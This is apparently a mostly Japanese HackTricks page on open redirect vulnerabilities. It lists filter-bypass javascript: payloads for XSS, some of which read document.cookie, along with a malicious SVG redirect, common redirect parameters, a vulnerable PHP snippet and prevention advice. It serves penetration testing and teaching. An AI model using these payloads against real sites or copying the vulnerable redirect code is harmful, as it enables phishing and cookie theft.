Japanese - Ht

Open Redirect

ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

オープンリダイレクト

ローカルホストまたは任意のドメインにリダイレクト

pageURL Format Bypass

XSSへのオープンリダイレクト

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

SVGファイルをアップロードするオープンリダイレクト

An open redirect vulnerability can be exploited when uploading SVG files. When an application allows users to upload files and does not properly validate the redirect URL, an attacker can upload a malicious SVG file containing a crafted URL that redirects users to a malicious website. This can be used in phishing attacks to trick users into visiting a fake website that appears legitimate.

<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

一般的なインジェクションパラメータ

An open redirect vulnerability exists when a web application allows users to navigate to an external URL of the attacker's choosing. This can be exploited by an attacker to trick users into visiting malicious websites while appearing to be on a trusted domain. To identify open redirect vulnerabilities, testers should look for the following parameters in URLs:

  • url

  • link

  • next

  • target

  • rurl

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

コード例

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

オープンリダイレクト

オープンリダイレクトは、攻撃者が悪意のあるサイトにユーザーをリダイレクトするために悪用できる脆弱性です。攻撃者はリンクを送信し、ユーザーを騙して信頼されたサイトに見せかけることができます。ユーザーがリンクをクリックすると、オープンリダイレクトが発生し、攻撃者のコントロール下にあるサイトにリダイレクトされます。これにより、攻撃者はユーザーをフィッシングサイトやマルウェアに誘導することができます。

response.redirect("http://mysafedomain.com");

PHP

Open Redirect

An open redirect vulnerability exists when a web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect. Attackers can abuse this vulnerability to trick users into visiting malicious sites by disguising the malicious URL as a trustworthy one.

Example

<?php
$redirect_url = $_GET['url'];
header('Location: ' . $redirect_url);
?>

In this example, the PHP script takes a URL from the url parameter in the query string and redirects the user to that URL using the header() function. An attacker can craft a malicious URL like http://example.com/redirect.php?url=http://malicioussite.com to redirect users to a malicious site.

Prevention

To prevent open redirect vulnerabilities, always validate and sanitize user input before using it in a redirect. Whitelist allowed domains or use a list of safe URLs to compare against. Additionally, avoid using user-controlled input directly in the redirect mechanism.

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>

ツール

リソース

ゼロからヒーローまでのAWSハッキングを学ぶ htARTE (HackTricks AWS Red Team Expert)!

HackTricks をサポートする他の方法:

PreviousOAuth to Account takeoverNextParameter Pollution

Last updated